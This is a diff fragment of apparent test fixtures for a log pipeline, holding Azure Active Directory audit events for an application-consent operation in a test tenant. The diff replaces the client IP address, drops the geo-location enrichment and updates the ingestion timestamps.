"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125386800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19767,25 +18057,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19799,7 +18071,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19938,7 +18210,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -19950,12 +18222,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036588200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125393200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19981,25 +18253,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20013,7 +18267,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20145,7 +18399,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -20157,12 +18411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036592300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F